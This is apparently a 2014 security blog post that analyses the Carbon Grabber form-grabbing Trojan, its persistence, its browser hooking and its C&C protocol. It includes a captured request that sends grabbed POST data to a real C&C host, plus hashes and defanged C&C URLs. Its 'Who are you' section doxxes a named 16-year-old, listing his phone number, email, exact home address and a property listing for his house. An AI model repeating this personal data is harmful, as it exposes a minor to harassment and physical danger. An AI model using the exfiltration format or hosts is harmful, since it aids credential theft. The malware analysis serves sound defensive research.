Tuesday, May 13, 2014

Carbon Grabber - Malware to the masses

This story begins with a very eye-catching infographic banner that was posted on Hack Forums at the end of January. The banner was selling a new form-grabber written in C++ that claims to be an x86 & x64 Userkit (Ring 3 Rootkit), fully code-injected (except for x64) and capable of stealing information from the latest versions of the three major web-browsers: Chrome, Firefox and IE.
Back then, the Trojan was offered by his seller, Alex™, as a “beta” version for an extremely cheap price of $75, while noting that the prices will be going up soon.


I didn't find it too interesting and continued on with my cyber-life, until few days ago while investigating a Zeus server I noticed a copy of the same Carbon Grabber panel with a different name - “12AM Form Grabber” (only god knows why they picked that name). It drew my attention and I decided to start and investigate a bit more about this Carbon Grabber.



The investigation started by looking for more information about this project in some hacking forums. I noticed that several different people are claiming to sell/resell it, some sell it under different names like Medusa, and there are even some cracked versions of it, bundled with RAT of course (you can never trust a fraudster).
So I decided to head over to the original thread in HF to see what's new with this project. First thing I noticed is that the price was raised to $300, and that now the post has more than 35 pages. The seller also added a big red warning for his clients that he's the only seller and they shouldn't trust anyone besides of him, because it's impossible to obtain the builder. All of these gave me the impression that this form-grabber is starting to become very popular. I also noticed that the change-log was updated to the following:
Change log:
v0.1: added x86 userkit
v0.2: Fixed a few issues with the panel
v0.3: Fixed startup issues, improved on IE plus halved the size
v0.4: minor fixes
v0.5: major fixes for 32 bit
v0.6: IE fixes as we had some reports of problems with IE11
v0.7: Online builder/updater
v0.8: Fixed an error some users ran into.
v0.9: Windows 8.1 small fix with some dependencies
Online builder/updater he said there? Let's check it out!
On another thread that was opened by the seller he was very proud to present his initiative idea of making this online builder for his Trojan. Of course he didn't provide a link to his builder, but a quick Google search led me to his website: http://carbongrabber.biz/
Unfortunately the registration required a key, and without a user there's nothing much I could do there. So I decided to look for other ways in. First thing I wanted to do is to get CloudFlare's protection out of the way. With some passive DNS magic I was able to get the server's IP address, which turned out to be a Windows 2003 server with XAMPP installed on it.
I knew that XAMPP comes with Webalizer, and surprisingly it was left wide open for everyone to see.
One of the leading URLs there was actually the ZIP file of the web-panel for Carbon Grabber, with ~150 clicks during March and April (That could indicate the number of clients he have). So I grabbed a copy of the panel and continued on because what I really wanted is to get a sample for me to analyze.
While further checking the website I realized two things: First is that the online builder's panel is based on the Carbon's web-panel. The second is that the guy behind it has completely zero knowledge in web-application security.
Without getting too much into details, I was able to find several vulnerabilities and from there to grab myself few good executable samples of the Carbon Formgrabber.
For those of you who want to see the online builder works, here's an instructional video made by the seller that explains the process (supposed to be available only for clients): https://www.youtube.com/watch?v=m18OtC_kXDo
If you wonder how it's being done behind the scenes, due to the fact that the C&C URL is saved in a resource inside the executable (will be explained later), my guess is that the PHP calls a ResHacker tool over CLI, reads a stub file, modifies its resource and sends it back to the client. But it could also be hex-modified directly in the bin-content the same way.
Anyone said eval()? :-)


Analysing the executable

Luckily the samples I obtained were taken directly from the panel (so called stub) and were not even packed by any public/private crypter.
Running the sample in my VM revealed a very straight-forward behavior:
The Trojan's process creates an svchost.exe process (while leaving its process running), and uses it to execute a RegSetValue operation to allow the Trojan's persistence with the following reg-key: "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft"  With the value: "C:\Documents and Settings\{USER}\Local Settings\Application Data\svchost.exe".
After that svchost.exe is used to copy the Trojan's executable as a read-only/system/hidden file to "C:\Documents and Settings\Yolo\Local Settings\Application Data\svchost.exe".
When everything is done, the svchost.exe process exit and the Trojan's process is taking care for the form-grabbing, while leaving the Trojan's original file on my desktop.
When running, the Trojan's set its mutex to the string mutex to make sure it's not running twice.
Its form-grabbing capabilities are done by hooking HttpSendRequestA & HttpSendRequestW functions to allow intercepting to POST requests (including requests over SSL) sent by the browser.
Like I mentioned earlier, the Trojan's C&C URL is taken from a resource named l33t (Yeah right...) saved inside the binary:



Seems like the programmer forgot to implement an exception handling, so when the Trojan received no response for the DNS request of the C&C's domain it just crashed the whole browser (that's l33t!).
I had no other choice but to help the Trojan to communicate, so I configured a working domain and tried again. The data was sent to the server in the following format:
GET /path/index.php?a=insert&name=MICROSPO-F5W21&host=https://www.bankofamerica.com/&browser=IE%20W&post=dXNlcm5hbWU9YmxhYmxhYmxh HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 
Host: daneman.in 
a = Command
Because the index.php serves both as a panel and as a drop-point for the Trojan, It can take any of the following commands: login|logout|panel|insert|del while insert is the only command a bot can send and the rest are reserved for the administration.
name = Computer-name
host = Accessed URL
post = Grabbed POST data (Encoded with base64)

Another thing I noticed while analysing the binary is the following string that indicates the Project's path on the author's PC: C:\Users\Iden\Documents\Visual Studio 2010\Projects\FormGrabberAlexHF\Release\FormGrabberAlexHF.pdb
Looking for FormGrabberAlexHF in VirusTotal revealed many unpacked beta samples that were uploaded during the first days when this Trojan was published (first sample was sent on 2014-01-20 and the last one on 2014-03-21) - a total of 11 samples, most of them with low detection ratio.
I couldn't find any evidence for privilege-escalation like mentioned by the author.
At this point I decided I had enough and wanted to dig more about the guy who's selling it.


Who are you Alex™?

Although I usually tend not to focus on this part, this time I found it really amusing because the information was so easy to obtain that I decided to make a full link-analysis on that guy, hopefully teaching him a lesson that being a criminal doesn't pay off. So let's begin:
First thing I did was to look for additional forum posts opened by Alex over HF. I was able to find few interesting posts that indicated he's on the fraud business for few years already.
Those are just several of his large projects: GalaxyJDB (or Galaxy Java Drive-By), Bitcoin miner, Terminal Keylogger & OMC Exchange (a marketplace for exchanging Bitoins and OmniCoins, which are used by the HF community).
While looking for more info about the guy I noticed he used to be known as sblfc, which was something that I saw both on his site's Webalizer page, and on his profile in HF:


Additionally, it seemed that the guy has a weird hobby of buying domain names. This is a partial list of the domains he owned and used during his time on HF:
[OFFLINE] httpbot.info
[OFFLINE] oraclle.info
[OFFLINE] installsforinstalls.info
[OFFLINE] hfbs.net
[OFFLINE] hf-alex.com
[OFFLINE] galaxyjdb.com
[OFFLINE] galaxyupload.us
[ONLINE] hackforums.in
[ONLINE] omc-wallet.com
[ONLINE] carbongrabber.biz

The WHOIS information for all of his online domains appeared to be:
Registrant Name:  Alex B
Registrant Organization: Quick Ware
Registrant Address1:  8 does it matter road
Registrant City:  Liverpool
Registrant State/Province: merseyside
Registrant Postal Code: l17 7ja
Registrant Country:  UNITED KINGDOM
Registrant Country Code: GB
Registrant Phone Number: +44.7543642587
Registrant Email:  sblfc1234@gmail.com
But is this information actually real? Well, most of it.
A quick Google search for sblfc led me to an old twitter account he owned, and guess what was his first tweet, which by the way, correlates beautifully with the other information I found:



So nice to meet you, Sasha Bessell. (sblfc is acronym of Sasha Bessell Liverpool F.C.)
Little bit of more digging led me to his Facebook account. To my surprise, Alex turned out to be a 16 years old kid from Liverpool city, a pretty talented kid I must say. But after gaining so much information I just couldn't stop there!
I already knew his name, his age and his general location (even a ZIP code), but that was not enough to get an exact address.
I noticed that on the same Vimeo profile where he had a video that shows his bot's functionlity, he also published a short test video of his GoPro quadcopter.
The video actually shows his neighborhood and his house (Nr. 8 revealed at 2:29, just like mentioned in the WHOIS).
So with some Google Map's magic, I was scanning around the ZIP code area mentioned in the WHOIS and compared it with what I saw over the GoPro video (I tried to explain the process with this cool infographic). After few minutes I was able to locate his exact house's address:
8 Bentley Rd.
Liverpool, L17 7JA
UK



View Larger Map



And if this is not enough, you can even take a look at his house from the inside because Venmore (an estate agent for Liverpool's area) just gives this information free for everyone: Venmore property 2619417
It's just amazing what you can do with the internet these days... ;)

Other interesting/funny findings:
https://localbitcoins.com/accounts/profile/sblfc/
https://www.coinpayments.net/feedback-0ab352c9fb41ca286f260ae014fb7817
https://bitcointalk.org/index.php?topic=180746.msg1887735#msg1887735
http://podbay.fm/show/485720832

Conclusions
So what we had here is a cheap (in price and in quality) form-grabbing Trojan that is becoming a favorite by the script-kiddies, and one careless kid that is making pretty good profit out of it.
Worth mentioning that Alex was not working alone on this project. He seems to have another anonymous partner for his eCrime business.
But I think we had enough for one day and this is a good time to leave it for law enforcements to do the rest.

MD5s:
d76598fa4b7357712cfb5fbd2b48b323
9a3d60084b9061213d4c8cbc2bf26cca
3cc420de3451dad717620060dbf3c4a6
72de02b498d361ab8ed3f33c9f947424
bf640c33649cdef80ba30e8e356a9cd9
d72b0bdb3c529ef63c44ef962dcafa31
118718efeb9a0c28c63aca5a63c5687b
86bf823ba13df8b41425f8d9a9108261
b7e0dcee11d412b89594a7afc1838246
0a8108a35c53079a89ba1719909ff426
313ba4424bdd98f0ff381be50769dba1

C&C Locations:
hxxp://hostech.pw/graba/index.php?a=login
hxxp://backinmotionmassage.com/xmlrpc/fonts/index.php?a=login
hxxp://daneman.in/path/index.php?a=login
hxxp://icewire.info/CzechCarbon/form/index.php?a=login
hxxp://icewire.info/OlokpaCarbon/form/index.php?a=login


Update 15 May 2014:
Looks like I'm not the only one that was chasing Mr. Sasha. Only one day after I published this blog, Alex received a very unpleasant visit by the police at his parent's house and posted the image below at HF (forgot to remove image metadata BTW).
The conversation (along with the picture) was removed later on that day and I only noticed it on one of the blogs I'm following, but according to that blog's author it might be related to an illegal use of Blackshades RAT Trojan.
Alex, from the other hand, answered to one of HF users by saying: "Not much has happened so far, hope it stays that way. For now I'm not going to explain what happened, but I will later."


Update 19 June 2014:
I was still following this thing up, and found out that Carbon Grabber's website is down, showing the message: "Dear carbonformgrabber customers Alex has been arrested for unknown reasons. You must now contact the developer directly, skype: tryigb I will be releasing new updated bins to customers."
I really hope not to see that kid coming back with a new nickname. But looks like we have a new target now ;)

No comments:

Post a Comment